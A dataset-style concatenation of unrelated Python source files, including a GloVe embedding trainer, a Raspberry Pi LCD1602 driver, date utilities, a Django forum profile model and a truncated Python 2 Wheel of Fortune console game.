                self.my_pen.pendown()
            # Move the pen to the start of the next row.
            self.my_pen.penup()
            self.my_pen.setheading(270)
            self.my_pen.forward(side)
            self.my_pen.setheading(180)
            self.my_pen.forward(side * self.maze_cols)
            self.my_pen.setheading(0)
            self.my_pen.pendown()
if __name__ == '__main__':
    # NOTE(review): each constructed PathFinder opens a turtle window;
    # only the last instance is actually solved below.
    p = PathFinder((4, 1), (4, 3), path="path_finder/mazes/maze.txt", draw_maze=True)
    p = PathFinder((0,1), (11, 7), path="path_finder/mazes/maze2.txt", draw_maze=True)
    p = PathFinder((0, 1), (15, 14), path="path_finder/mazes/maze3.txt", draw_maze=True)
    p.find_path()
    print(p)
| StarcoderdataPython |
1796423 | <reponame>stevedya/wagtail<gh_stars>1-10
from wagtail.test.dummy_external_storage import * # noqa
| StarcoderdataPython |
'''
Author: jianzhnie
Date: 2022-01-05 16:21:54
LastEditTime: 2022-03-07 16:16:06
LastEditors: jianzhnie
Description:
'''
import sys
import torch
import torch.optim as optim
from tqdm.auto import tqdm
from nlptoolkit.data.utils.utils import (get_loader, load_reuters,
save_pretrained)
from nlptoolkit.datasets.nlmdataset import GloveDataset
from nlptoolkit.models.lm.glove import GloveModel
sys.path.append('../../')
if __name__ == '__main__':
    # Training hyperparameters.
    embedding_dim = 64
    context_size = 2
    batch_size = 1024
    num_epoch = 10
    # Hyperparameters controlling the GloVe sample weights f(X_ij):
    # counts are capped at m_max and scaled with exponent alpha.
    m_max = 100
    alpha = 0.75
    # Build the GloVe training set (co-occurrence counts) from the corpus.
    corpus, vocab = load_reuters()
    dataset = GloveDataset(corpus, vocab, context_size=context_size)
    data_loader = get_loader(dataset, batch_size)

    device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
    model = GloveModel(len(vocab), embedding_dim)
    model.to(device)
    optimizer = optim.Adam(model.parameters(), lr=0.001)

    model.train()
    for epoch in range(num_epoch):
        total_loss = 0
        for batch in tqdm(data_loader, desc=f'Training Epoch {epoch}'):
            # words, contexts, counts shapes: batch_size * 1
            words, contexts, counts = [x.to(device) for x in batch]
            # Look up the word / context embeddings and biases for the batch.
            # word_embeds: Batch_size * Embedding_dim
            # word_biases: Batch_size * 1
            word_embeds, word_biases = model.forward_w(words)
            # context_embeds: Batch_size * Embedding_dim
            # context_biases: Batch_size * 1
            context_embeds, context_biases = model.forward_c(contexts)
            # Regression target; log(counts + 1) could be used for smoothing.
            log_counts = torch.log(counts)
            # Sample weights: f(X) = min((X / m_max) ** alpha, 1).
            weight_factor = torch.clamp(torch.pow(counts / m_max, alpha),
                                        max=1.0)
            optimizer.zero_grad()
            # Per-sample squared error of the GloVe regression.
            loss = (torch.sum(word_embeds * context_embeds, dim=1) +
                    word_biases + context_biases - log_counts)**2
            # Weighted average loss over the batch.
            wavg_loss = (weight_factor * loss).mean()
            wavg_loss.backward()
            optimizer.step()
            total_loss += wavg_loss.item()
        print(f'Loss: {total_loss:.2f}')

    # Merge the word and context embedding matrices into the final
    # pretrained vectors and save them.
    combined_embeds = model.w_embeddings.weight + model.c_embeddings.weight
    save_pretrained(vocab, combined_embeds.data, 'glove.vec')
| StarcoderdataPython |
1692386 |
import re
from datetime import date as datetime_date
from .add_time import add_months, add_days
from calendar import day_name, day_abbr
from .YearMonth import YearMonth
from .YearQuarter import YearQuarter
from .to_quarter import get_quarter
from .remove_non_alphanumeric import remove_non_alphanumeric
def to_monthname(date, abr = False):
    """Return the English month name of *date* ('January', ...).

    :param abr: if True, return the three-letter abbreviation ('Jan').
    :raises ValueError: if *date* cannot be formatted as a month name.
    """
    try:
        result = date.strftime('%B')
    except Exception as error:
        # Keep raising ValueError (original behaviour), but with a
        # useful, chained message instead of printing and 'oops'.
        raise ValueError(
            f'cannot format {date!r} of type {type(date).__name__} '
            'as a month name'
        ) from error
    if abr:
        return result[:3]
    else:
        return result
def to_weekday(date):
    """Return the weekday index of *date* (Monday == 0 ... Sunday == 6)."""
    return date.weekday()
def to_weekdayname(date, abr=False):
    """Return the weekday name of *date* ('Monday', ...), abbreviated
    to three letters ('Mon') when *abr* is true."""
    names = day_abbr if abr else day_name
    return names[date.weekday()]
def to_date_part(date, date_part, sep ='-', abr = False):
    """Extract a named part of *date*.

    *date_part* is normalized (lower-cased, punctuation stripped).
    Supported parts: day, month, monthname, quarter, yearmonth,
    yearmonthabr, yearmonthname, yearquarter, weekday, weekdayname;
    anything else yields the year.
    """
    date_part = date_part.lower()
    date_part = remove_non_alphanumeric(s = date_part, replace_with = '', keep_underscore = False)
    if date_part == 'day': return date.day
    elif date_part == 'month': return date.month
    elif date_part == 'monthname': return to_monthname(date=date, abr=abr)
    elif date_part == 'quarter': return get_quarter(date=date)
    elif date_part == 'yearmonth': return YearMonth(date=date, sep=sep)
    elif date_part == 'yearmonthabr': return YearMonth(date=date, sep=sep, month_as='abr')
    elif date_part == 'yearmonthname': return YearMonth(date=date, sep=sep, month_as='name')
    elif date_part == 'yearquarter': return YearQuarter(date=date, sep=sep)
    # (removed a second, unreachable 'monthname' branch that duplicated
    # the one above)
    elif date_part == 'weekday': return to_weekday(date)
    elif date_part == 'weekdayname': return to_weekdayname(date=date, abr=abr)
    else: return date.year
def yearmonth_to_date(x, day = 1):
    """Convert a year-month value to a date on the given *day*.

    Accepts an int like 202102, a string starting with a 4-digit year
    and ending with the month digits, or a YearMonth instance. If *day*
    does not exist in the target month (e.g. 31 in February), the last
    day of that month is used. Returns None for unsupported types.
    """
    if type(x) is int:
        year = x // 100
        month = x % 100
    elif type(x) is str:
        year = int(re.findall(pattern = r'^\d+', string = x)[0][:4])
        month = int(re.findall(pattern = r'\d+$', string = x)[0][-2:])
    elif type(x) is YearMonth:
        year = x.year.value
        month = x.month.value
    else:
        return None
    try:
        result = datetime_date(year = year, month = month, day = day)
    except ValueError:
        # *day* overflows the month: clamp by stepping to the 1st of the
        # next month and going back one day.
        # (Was a bare ``except:``, which also hid invalid year/month.)
        first_day_of_the_month = datetime_date(year = year, month = month, day = 1)
        first_day_of_next_month = add_months(date = first_day_of_the_month, months = 1)
        result = add_days(date = first_day_of_next_month, days = -1)
    return result
| StarcoderdataPython |
#!/usr/bin/python
#import
import RPi.GPIO as GPIO
import rasiberryPiGPIOBaseController.Pin as Pin
import time
# Define GPIO to LCD mapping
# NOTE(review): pin numbers presumably follow the Pin helper's numbering
# scheme (BCM vs BOARD) -- confirm against its configuration.
LCD_RS = 23
LCD_E  = 24
LCD_D4 = 25
LCD_D5 = 1
LCD_D6 = 12
LCD_D7 = 16

# Define some device constants
LCD_WIDTH = 16    # Maximum characters per line
# Register-select levels: high = character data, low = command byte.
LCD_CHR = Pin.PIN_HIGH
LCD_CMD = Pin.PIN_LOW

LCD_LINE_1 = 0x80 # LCD RAM address for the 1st line
LCD_LINE_2 = 0xC0 # LCD RAM address for the 2nd line
LED_CMD_NEWCHAR = 0x40 # LCD RAM address CGRAM (customer defined character)

# Timing constants
E_PULSE = 0.0005
E_DELAY = 0.0005
class LCD1602:
    """Driver for an HD44780-style 16x2 character LCD in 4-bit mode.

    The six Pin objects handed to the constructor drive RS, Enable and
    data lines D4-D7; the display is initialised on construction.
    """

    def __init__(self, rsPin, enablePin, D4Pin, D5Pin, D6Pin, D7Pin):
        # name -> CGRAM slot index of user-defined characters.
        self._newCharacters = {}
        self._rsPin = rsPin
        self._enablePin = enablePin
        self._D4Pin = D4Pin
        self._D5Pin = D5Pin
        self._D6Pin = D6Pin
        self._D7Pin = D7Pin
        # initial all output pins
        # Fixed: the original called _D4Pin.setupOutput() four times, so
        # D5-D7 were never configured as outputs.
        self._rsPin.setupOutput()     # RS
        self._enablePin.setupOutput() # E
        self._D4Pin.setupOutput()     # DB4
        self._D5Pin.setupOutput()     # DB5
        self._D6Pin.setupOutput()     # DB6
        self._D7Pin.setupOutput()     # DB7
        self.lcd_init()

    def lcd_init(self):
        """Run the HD44780 4-bit initialisation sequence and clear."""
        self.lcd_send_byte(0x33, LCD_CMD) # 110011 Initialise
        self.lcd_send_byte(0x32, LCD_CMD) # 110010 Initialise
        self.lcd_send_byte(0x06, LCD_CMD) # 000110 Cursor move direction
        self.lcd_send_byte(0x0C, LCD_CMD) # 001100 Display On, Cursor Off, Blink Off
        self.lcd_send_byte(0x28, LCD_CMD) # 101000 Data length, number of lines, font size
        self.lcd_send_byte(0x01, LCD_CMD) # 000001 Clear display
        time.sleep(E_DELAY)

    def lcd_send_byte(self, bits, mode):
        """Send one byte over the 4-bit bus, high nibble first.

        :param bits: data byte
        :param mode: LCD_CHR for character data, LCD_CMD for a command
        """
        self._rsPin.output_setup(mode)  # RS
        # High bits
        self._D4Pin.output_setup(Pin.PIN_LOW)
        self._D5Pin.output_setup(Pin.PIN_LOW)
        self._D6Pin.output_setup(Pin.PIN_LOW)
        self._D7Pin.output_setup(Pin.PIN_LOW)
        if bits&0x10==0x10:
            self._D4Pin.output_setup(Pin.PIN_HIGH)
        if bits&0x20==0x20:
            self._D5Pin.output_setup(Pin.PIN_HIGH)
        if bits&0x40==0x40:
            self._D6Pin.output_setup(Pin.PIN_HIGH)
        if bits&0x80==0x80:
            self._D7Pin.output_setup(Pin.PIN_HIGH)
        # Toggle 'Enable' pin to latch the high nibble.
        self.lcd_toggle_enable()
        # Low bits
        self._D4Pin.output_setup(Pin.PIN_LOW)
        self._D5Pin.output_setup(Pin.PIN_LOW)
        self._D6Pin.output_setup(Pin.PIN_LOW)
        self._D7Pin.output_setup(Pin.PIN_LOW)
        if bits&0x01==0x01:
            self._D4Pin.output_setup(Pin.PIN_HIGH)
        if bits&0x02==0x02:
            self._D5Pin.output_setup(Pin.PIN_HIGH)
        if bits&0x04==0x04:
            self._D6Pin.output_setup(Pin.PIN_HIGH)
        if bits&0x08==0x08:
            self._D7Pin.output_setup(Pin.PIN_HIGH)
        # Toggle 'Enable' pin to latch the low nibble.
        self.lcd_toggle_enable()

    def lcd_toggle_enable(self):
        """Pulse the Enable pin so the LCD accepts the data lines."""
        time.sleep(E_DELAY)
        self._enablePin.output_setup(Pin.PIN_HIGH)
        time.sleep(E_PULSE)
        self._enablePin.output_setup(Pin.PIN_LOW)
        time.sleep(E_DELAY)

    def convertToHEXForChar(self, charList):
        """Convert a string/iterable of characters to their byte codes."""
        convertedCharList = []
        for message in charList:
            convertedCharList.append(ord(message))
        return convertedCharList

    def displayChar(self, line, *args):
        """Write the concatenated byte lists in *args* to *line*,
        truncated to the display width."""
        concatedList = []
        for argItem in args:
            concatedList.extend(argItem)
        self.lcd_send_byte(line, LCD_CMD)
        i = 0
        for message in concatedList:
            if(i >= 16):
                break
            self.lcd_send_byte(message, LCD_CHR)

    def displayCharFromPosition(self, line, position, *args):
        """Like displayChar, but start writing at column *position*."""
        concatedList = []
        for argItem in args:
            concatedList.extend(argItem)
        self.lcd_send_byte(line + (0x01 * position), LCD_CMD)
        i = 0
        for message in concatedList:
            if(i >= (16 - position)):
                break
            self.lcd_send_byte(message, LCD_CHR)

    def createNewCharacterInOnce(self, bitsList):
        """Upload all custom 5x8 glyphs in *bitsList* (name -> 8 row bytes)
        to CGRAM in one pass, remembering each glyph's slot index."""
        allHexList = []
        i = 0
        for key in bitsList:
            oneCharacterHex = bitsList[key]
            allHexList.extend(oneCharacterHex)
            self._newCharacters[key] = i
            i += 1
        # Point the address counter at the start of CGRAM, then stream
        # all glyph rows.
        self.lcd_send_byte(LED_CMD_NEWCHAR, LCD_CMD)
        for bits in allHexList:
            self.lcd_send_byte(bits, LCD_CHR)

    def getNewCharacter(self, name):
        """Return the display code of the custom glyph *name*
        (0x00-based CGRAM slot)."""
        newCharHex = 0x00 + self._newCharacters[name]
        if newCharHex is None:
            newCharHex = 0x00
        return newCharHex

    def simpleDemo(self):
        """Endless demo cycling custom glyphs and sample values.

        NOTE(review): with the source's indentation lost, the original
        extent of the ``while True`` body is ambiguous; here the whole
        remainder cycles inside the loop -- confirm against upstream.
        """
        newCharacter1 = [0x04, 0x06, 0x04, 0x06, 0x04, 0x04, 0x0e, 0x0e]
        newCharacter2 = [0x04, 0x08, 0x0a, 0x12, 0x11, 0x11, 0x0a, 0x04]
        allCharacters = {
            "temperature": newCharacter1,
            "pressure": newCharacter2
        }
        self.createNewCharacterInOnce(allCharacters)
        self.displayChar(LCD_LINE_1, [self.getNewCharacter("temperature")], self.convertToHEXForChar(" simple demo"))
        self.displayChar(LCD_LINE_2, [self.getNewCharacter("pressure")], self.convertToHEXForChar(" for LCD1602"))
        time.sleep(3)
        while True:
            self.displayCharFromPosition(LCD_LINE_1, 10, self.convertToHEXForChar("10"))
            self.displayCharFromPosition(LCD_LINE_2, 10, self.convertToHEXForChar("50%"))
            time.sleep(3)
            self.displayCharFromPosition(LCD_LINE_1, 10, self.convertToHEXForChar("25"))
            self.displayCharFromPosition(LCD_LINE_2, 10, self.convertToHEXForChar("90%"))
            time.sleep(3)
            self.displayChar(LCD_LINE_1, self.convertToHEXForChar("simple demo end"))
            self.displayChar(LCD_LINE_2, self.convertToHEXForChar("simple demo end"))
            time.sleep(3)
            self.displayChar(LCD_LINE_1, [self.getNewCharacter("temperature"), 0x02], self.convertToHEXForChar(" simple demo"))
            self.displayChar(LCD_LINE_2, [self.getNewCharacter("pressure"), 0x03], self.convertToHEXForChar(" for LCD1602"))
            time.sleep(3)
| StarcoderdataPython |
139104 | <filename>ooi_harvester/metadata/cli.py<gh_stars>1-10
import datetime
import typer
from . import create_metadata
app = typer.Typer()
@app.command()
def create(
    s3_bucket: str = "ooi-metadata",
    axiom: bool = False,
    global_ranges: bool = False,
    cava_assets: bool = False,
    ooinet_inventory: bool = False,
    ooi_streams: bool = False,
    instrument_catalog: bool = False,
    legacy_catalog: bool = False,
):
    # Each boolean flag requests a refresh of the corresponding metadata
    # source; results are written to the given S3 bucket.
    # (Comments only: a docstring would change typer's --help output.)
    typer.echo("Metadata creation/refresh started.")
    start_time = datetime.datetime.utcnow()
    create_metadata(
        s3_bucket,
        axiom_refresh=axiom,
        global_ranges_refresh=global_ranges,
        cava_assets_refresh=cava_assets,
        ooinet_inventory_refresh=ooinet_inventory,
        ooi_streams_refresh=ooi_streams,
        instrument_catalog_refresh=instrument_catalog,
        legacy_inst_catalog_refresh=legacy_catalog,
    )
    # Report the wall-clock duration of the refresh.
    time_elapsed = datetime.datetime.utcnow() - start_time
    typer.echo(
        f"Metadata creation/refresh finished. Process took {str(time_elapsed)}"
    )
if __name__ == "__main__":
app()
| StarcoderdataPython |
from guizero import App, Text
a = App()
# Set a monospace font as the app-wide default.
a.font = "courier new"
# t1 inherits the app defaults; each label shows its effective settings.
t1 = Text(a)
t1.value = "{}, {}, {}".format(t1.font, t1.text_size, t1.text_color)
# t2 overrides only the font family.
t2 = Text(a, font="arial")
t2.value = "{}, {}, {}".format(t2.font, t2.text_size, t2.text_color)
# t3 overrides colour, size and font.
t3 = Text(a, color="red", size=8, font="verdana")
t3.value = "{}, {}, {}".format(t3.font, t3.text_size, t3.text_color)
# Start the GUI event loop (blocks until the window closes).
a.display()
from enum import Enum as BaseEnum
from .packing import pack_int64
from .deserialization import deserialize_int64
from .exceptions import DeserializationError
class Enum(BaseEnum):
    """Enumeration with ordering and int64 (de)serialization support.

    Members order by their underlying value, but only against members of
    the same enum class; cross-class comparisons return NotImplemented.
    """

    def __ge__(self, other):
        if self.__class__ is not other.__class__:
            return NotImplemented
        return self._value_ >= other._value_

    def __gt__(self, other):
        if self.__class__ is not other.__class__:
            return NotImplemented
        return self._value_ > other._value_

    def __le__(self, other):
        if self.__class__ is not other.__class__:
            return NotImplemented
        return self._value_ <= other._value_

    def __lt__(self, other):
        if self.__class__ is not other.__class__:
            return NotImplemented
        return self._value_ < other._value_

    def pack(self, stream):
        """Pack.

        Writes this member's value as a packed int64.

        :param stream: Stream to pack the type to.
        """
        stream.write(pack_int64(self.value))

    @classmethod
    def deserialize(cls, ser):
        """Deserialize.

        Reads an int64 from *ser* and maps it back to a member of *cls*.

        :raises entangle.DeserializationError:
            if the serialized input could not be deserialized.
        """
        raw = deserialize_int64(ser)
        try:
            return cls(raw)
        except ValueError:
            raise DeserializationError('%r is not a valid %s value' %
                                       (raw, cls.__name__))
| StarcoderdataPython |
1640269 | import json
def get_report_type(report_type, date_range, rsid):
    """Build an Adobe Analytics report request for *report_type*.

    :param report_type: 'core_metrics' or 'emea_metrics'.
    :param date_range: Adobe dateRange string injected into the template.
    :param rsid: report-suite id, used only by 'emea_metrics'.
    :return: JSON request string, or None for an unknown report type.
    """
    if report_type == 'core_metrics':
        return get_core_metrics_report_type(date_range)
    if report_type == 'emea_metrics':
        return get_country_metrics_report_type(date_range, rsid)
    # Fix: the original message was missing the closing quote on 'conversion_rate'.
    print("You need to provide an Adobe report type like 'revenue' or 'conversion_rate'.")
    return None
# ToDo: Refactor hard coded paths.
def get_core_metrics_report_type(date_range):
    """Load the core-metrics report template and stamp *date_range* into it.

    Returns the request body serialized back to a JSON string.
    """
    # ToDo: Refactor hard coded path.
    template_path = "./dg_adobe/adobe_analytics_metrics_by_day.json"
    with open(template_path, "r") as template_file:
        report = json.load(template_file)
    # Overwrite the dateRange filter in the template.
    report["globalFilters"][3]["dateRange"] = date_range
    return json.dumps(report)
def get_country_metrics_report_type(date_range, rsid):
    """Load the per-country report template and stamp date range and rsid.

    Returns the request body serialized back to a JSON string.
    """
    # ToDo: Refactor hard coded path.
    template_path = "./dg_adobe/adobe_analytics_metrics_by_day_rsid.json"
    with open(template_path, "r") as template_file:
        report = json.load(template_file)
    # Overwrite the dateRange filter and target report suite in the template.
    report["globalFilters"][4]["dateRange"] = date_range
    report["rsid"] = rsid
    return json.dumps(report)
| StarcoderdataPython |
26830 | <filename>evaluation/dwf_power.py
from ctypes import *
from dwfconstants import *

# Load the Digilent WaveForms runtime (Linux shared-library build).
dwf = cdll.LoadLibrary("libdwf.so")

# Device handle filled in by FDwfDeviceOpen below.
hdwf = c_int()

dwf.FDwfParamSet(DwfParamOnClose, c_int(0)) # 0 = run, 1 = stop, 2 = shutdown

print("Opening first device")
# -1 selects the first available device.
dwf.FDwfDeviceOpen(c_int(-1), byref(hdwf))

if hdwf.value == hdwfNone.value:
    print("failed to open device")
    quit()

print(f'{hdwf=}')

# Disable auto-configure so settings are applied only on explicit Configure calls.
dwf.FDwfDeviceAutoConfigureSet(hdwf, c_int(0))

# set up analog IO channel nodes
# enable positive supply
dwf.FDwfAnalogIOChannelNodeSet(hdwf, c_int(0), c_int(0), c_double(True))
# set voltage to 1.2 V
dwf.FDwfAnalogIOChannelNodeSet(hdwf, c_int(0), c_int(1), c_double(1.2))
# master enable
dwf.FDwfAnalogIOEnableSet(hdwf, c_int(True))
dwf.FDwfAnalogIOConfigure(hdwf)

# Close the handle; DwfParamOnClose = 0 above keeps the supply running afterwards.
dwf.FDwfDeviceClose(hdwf)
1749071 | <filename>spirit/user/models.py
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from datetime import timedelta
from django.db import models
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
from django.utils import timezone
from django.conf import settings
from ..core.utils.models import AutoSlugField
class UserProfile(models.Model):
    """Spirit forum profile, attached one-to-one to the auth user model."""

    user = models.OneToOneField(settings.AUTH_USER_MODEL, verbose_name=_("profile"), related_name='st')
    slug = AutoSlugField(populate_from="user.username", db_index=False, blank=True)
    location = models.CharField(_("location"), max_length=75, blank=True)
    last_seen = models.DateTimeField(_("last seen"), auto_now=True)
    last_ip = models.GenericIPAddressField(_("last ip"), blank=True, null=True)
    timezone = models.CharField(_("time zone"), max_length=32, default='UTC')
    is_administrator = models.BooleanField(_('administrator status'), default=False)
    is_moderator = models.BooleanField(_('moderator status'), default=False)
    is_verified = models.BooleanField(_('verified'), default=False,
                                      help_text=_('Designates whether the user has verified his '
                                                  'account by email or by other means. Un-select this '
                                                  'to let the user activate his account.'))
    # Denormalized counters, presumably maintained by signal/handlers elsewhere — TODO confirm.
    topic_count = models.PositiveIntegerField(_("topic count"), default=0)
    comment_count = models.PositiveIntegerField(_("comment count"), default=0)
    # Used together by update_post_hash() to detect double posts within a window.
    last_post_hash = models.CharField(_("last post hash"), max_length=32, blank=True)
    last_post_on = models.DateTimeField(_("last post on"), null=True, blank=True)

    class Meta:
        verbose_name = _("forum profile")
        verbose_name_plural = _("forum profiles")

    def save(self, *args, **kwargs):
        # Normalize role flags before saving: superusers are implicitly
        # administrators, and administrators are implicitly moderators.
        if self.user.is_superuser:
            self.is_administrator = True

        if self.is_administrator:
            self.is_moderator = True

        super(UserProfile, self).save(*args, **kwargs)

    def get_absolute_url(self):
        # Canonical profile URL, keyed by the user's pk plus the slug.
        return reverse('spirit:user:detail', kwargs={'pk': self.user.pk, 'slug': self.slug})

    def update_post_hash(self, post_hash):
        """Atomically record *post_hash* as the user's latest post hash.

        Returns True when the hash was stored, False when the same hash was
        already stored within ST_DOUBLE_POST_THRESHOLD_MINUTES (i.e. the
        post looks like a double post and should be rejected).
        """
        assert self.pk

        # Let the DB do the hash
        # comparison for atomicity
        return bool(UserProfile.objects
                    .filter(pk=self.pk)
                    .exclude(
                        last_post_hash=post_hash,
                        last_post_on__gte=timezone.now() - timedelta(
                            minutes=settings.ST_DOUBLE_POST_THRESHOLD_MINUTES))
                    .update(
                        last_post_hash=post_hash,
                        last_post_on=timezone.now()))
| StarcoderdataPython |
3319236 | ##for Raleigh & Grant
##who contributed more than they know
################################################################################
############################## WHEEL OF FORTUNE ################################
################################################################################
import random
import string
WORDLIST_FILENAME = "words.txt"
def load_words():
    """
    Returns a list of valid words. Words are strings of lowercase letters.

    Depending on the size of the word list, this function may
    take a while to finish.
    """
    # 'with' guarantees the file handle is closed (the original leaked it),
    # and str.split replaces the long-deprecated string.split helper.
    with open(WORDLIST_FILENAME, 'r') as inFile:
        line = inFile.readline()
    return line.split()
def choose_word(wordlist):
    """Pick and return one word, uniformly at random, from *wordlist*.

    wordlist (list): list of words (strings).
    """
    return random.choice(wordlist)
# Module-level word list, loaded once at import time and shared by all rounds.
wordlist = load_words()
def start():
print string.center(("*" * 80), 80)
print string.center(("*" * 80), 80)
print string.center((("*" * 5) + (" " * 70) + ("*" * 5)), 80)
print string.center((("*" * 5) + (" " * 21) + "Welcome to WHEEL OF FORTUNE!" + (" " * 21) + ("*" * 5)), 80)
print string.center((("*" * 5) + (" " * 7) + "I'm your host, <NAME>, with your hostess <NAME>." + (" " * 7) + ("*" * 5)), 80)
print string.center((("*" * 5) + (" " * 70) + ("*" * 5)), 80)
print string.center(("*" * 80), 80)
print string.center(("*" * 80), 80)
playerNames_hum = ["Player 1", "Player 2", "Player 3"]
playerNames_comp = ["<NAME>", "Roger"]
playerOrder_val = [[0, 0], [0, 0], [0, 0]]
rounds = ["first", "second", "third", "fourth"]
gameSetup(playerNames_hum, playerNames_comp, playerOrder_val, rounds)
def gameSetup(playerNames_hum, playerNames_comp, playerOrder_val, rounds):
    """Collect the player roster, then launch the main game loop."""
    player_count = get_numPlayers()
    roster = get_playerNames(player_count, playerNames_hum, playerNames_comp)
    game(roster, playerOrder_val)
def game(players, playerOrder_val):
playerOrder = preRound_one(players, playerOrder_val)
## print "playerOrder is:", playerOrder
## print "playerOrder_val is equal to:", playerOrder_val
print string.center(("*" * 80), 80)
print string.center(("*" * 80), 80)
print ""
print string.center("ROUND ONE", 80)
print ""
print string.center(("*" * 80), 80)
print string.center(("*" * 80), 80)
playerOrder_val = round_one(playerOrder, playerOrder_val)
print "At the end of round one, the scores are:", playerOrder_val
print string.center(("*" * 80), 80)
print string.center(("*" * 80), 80)
print string.center("BEGIN ROUND TWO", 80)
print string.center(("*" * 80), 80)
print string.center(("*" * 80), 80)
raw_input("Press 'ENTER' to continue: ")
playerOrder_val = round_two(playerOrder, playerOrder_val)
print string.center(("*" * 80), 80)
print string.center(("*" * 80), 80)
print string.center("BEGIN ROUND THREE", 80)
print string.center(("*" * 80), 80)
print string.center(("*" * 80), 80)
raw_input("Press 'ENTER' to continue: ")
playerOrder_val = round_three(playerOrder, playerOrder_val)
print string.center(("*" * 80), 80)
print string.center(("*" * 80), 80)
print string.center("BEGIN ROUND FOUR", 80)
print string.center(("*" * 80), 80)
print string.center(("*" * 80), 80)
raw_input("Press 'ENTER' to continue: ")
playerOrder_val = round_four(playerOrder, playerOrder_val)
end_game(players)
def preRound_one(players, playerOrder_val):
    """Determine and return the turn order before round one begins."""
    return get_playerOrder(players, playerOrder_val)
def round_one(playerOrder, playerOrder_val):
## print "playerOrder_val is equal to:", playerOrder_val
game_round = 1
hidden_word = choose_word(wordlist).lower()
playerOrder_val_round = [[0, 0], [0, 0], [0, 0]]
alpha = string.ascii_lowercase
disp_word = "_ " * len(hidden_word)
incom_word = "_" * len(hidden_word)
print "The hidden_word is:", hidden_word
counter = 0
countDown = 11
while countDown > 0:
## for i in range(counter):
## counter -= 1
## print "counter is equal to:", counter
print ""
print "The first round puzzle is:", disp_word
for j in [0, 1, 2, 0, 1, 2, 0, 1, 2, 0]:
## counter -= 1
## print "counter is equal to:", counter
possession = True
if countDown == 0:
break
while possession == True:
countDown -= 1
if countDown == 0:
break
## print "counter is equal to:", counter
selection = 0
if counter > 0:
print disp_word
counter += 1
print ""
print "Remaining letters are:", str(string.upper(alpha))
print ""
selection = get_playerSelection(playerOrder, hidden_word, disp_word, j, playerOrder_val_round)
if selection == 3:
print ""
print "You chose to buy a vowel."
print ""
playerOrder_val_round[j][0] = (playerOrder_val_round[j][0] - 250)
guess = get_guessVowel()
guess = string.lower(guess)
if guess in alpha:
alpha = alpha.replace(guess, "")
else:
print ""
print "Sorry, '" + string.upper(guess) + "' has already been called in this round."
print playerOrder[j + 1] + " now takes possession of The Wheel."
print ""
raw_input(string.center(("-" * 80), 80))
print ""
## possession = False
break
print ""
print string.center(("-" * 80), 80)
print string.center(("Vanna, does the puzzle contain any '" + guess.upper() + "'s?"), 80)
raw_input(string.center(("-" * 80), 80))
print ""
if guess in hidden_word:
for i in range(len(hidden_word)):
if hidden_word[i] == guess:
disp_word = disp_word[0:(i * 2)] + guess + disp_word[((i * 2) + 1):]
incom_word = incom_word[0:i] + guess + incom_word[(i + 1):]
letter_app = 0
for i in range(len(hidden_word)):
if hidden_word[i] == guess:
letter_app += 1
if letter_app == 0 or letter_app == 1:
if letter_app == 0:
print "I'm sorry", playerOrder[j] + ", but there are no '" + guess.upper() + "'s in the puzzle."
print ""
possession = False
break
if letter_app == 1:
print "Good guess,", playerOrder[j] + "! There is 1", guess.upper(), "in the puzzle!"
print ""
print string.center(("-" * 80), 80)
print ""
else:
print "Good guess,", playerOrder[j] + "! There are", letter_app, "'" + guess.upper() + "'s in the puzzle!"
print ""
print string.center(("-" * 80), 80)
print ""
else:
print "I'm sorry", playerOrder[j] + ", but there are no '" + guess.upper() + "'s in the puzzle."
print "Possession of The Wheel passes to " + playerOrder[j + 1] + "."
print ""
possession = False
break
if selection == 1:
prize = get_prize(game_round)
subPrize = prize
if (type(prize) is int) or (prize == "freePlay"):
freePlay_choice = 0
if type(prize) is int:
print ""
print playerOrder[j] + " spun for $" + str(prize) + "!"
print ""
if prize is "freePlay":
print ""
print playerOrder[j], "spun for a FREE PLAY!"
print playerOrder[j] + ", you may solve or guess a letter (including vowels) without penalty."
print ""
selection_freePlay = get_freePlayChoice(playerOrder, j)
subPrize = 500
if selection_freePlay == 1:
guess = get_guessfreePlay()
if selection_freePlay == 2:
guess_word = get_guessWord()
if guess_word == hidden_word:
incom_word = guess_word
possession = True
break
else:
print ""
print "Sorry, that is not the solution to the puzzle."
print "Your Free Play spin, however, means that you keep possession of The Wheel."
print ""
guess = 1
if type(prize) is int:
guess = get_guessConsonant()
if type(guess) == str:
guess = string.lower(guess)
if guess != 1:
if guess in alpha:
alpha = alpha.replace(guess, "")
print ""
print string.center(("-" * 80), 80)
print string.center(("Vanna, does the puzzle contain any '" + guess.upper() + "'s?"), 80)
raw_input(string.center(("-" * 80), 80))
print ""
if guess in hidden_word or prize == "freePlay":
for i in range(len(hidden_word)):
if hidden_word[i] == guess:
disp_word = disp_word[0:(i * 2)] + guess + disp_word[((i * 2) + 1):]
incom_word = incom_word[0:i] + guess + incom_word[(i + 1):]
letter_app = 0
for i in range(len(hidden_word)):
if hidden_word[i] == guess:
letter_app += 1
if letter_app == 0:
print "I'm sorry", playerOrder[j] + ", but there are no '" + guess.upper() + "'s in the puzzle."
if prize == "freePlay":
print "Your Free Play spin, however, means that you keep possession of The Wheel."
print ""
else:
print "Possession of The Wheel passes to " + playerOrder[j + 1] + "."
print ""
print string.center(("-" * 80), 80)
print ""
possession = False
break
if letter_app == 1:
print disp_word
print ""
print "Good guess,", playerOrder[j] + "! There is 1", guess.upper(), "in the puzzle!"
print "That adds $" + str(subPrize) + " to your total prize score!"
print ""
playerOrder_val_round[j][0] = playerOrder_val_round[j][0] + (subPrize * letter_app)
print string.center(("-" * 80), 80)
print ""
print string.center((playerOrder[j] + "'s total prize score is now $" + str(playerOrder_val_round[j][0]) + "!"), 80)
print ""
raw_input(string.center(("-" * 80), 80))
print ""
possession = True
if letter_app >= 2:
print disp_word
print ""
print "Good guess:", playerOrder[j] + "! There are", letter_app, "'" + guess.upper() + "'s in the puzzle!"
print "That adds $" + str(subPrize * letter_app) + " to your total prize score!"
print ""
playerOrder_val_round[j][0] = playerOrder_val_round[j][0] + (subPrize * letter_app)
print string.center(("-" * 80), 80)
print ""
print string.center((playerOrder[j] + "'s total prize score is now $" + str(playerOrder_val_round[j][0]) + "!"), 80)
print ""
raw_input(string.center(("-" * 80), 80))
print ""
possession = True
if incom_word == hidden_word:
break
else:
print "I'm sorry", playerOrder[j] + ", but there are no '" + guess.upper() + "'s in the puzzle."
if prize == "freePlay":
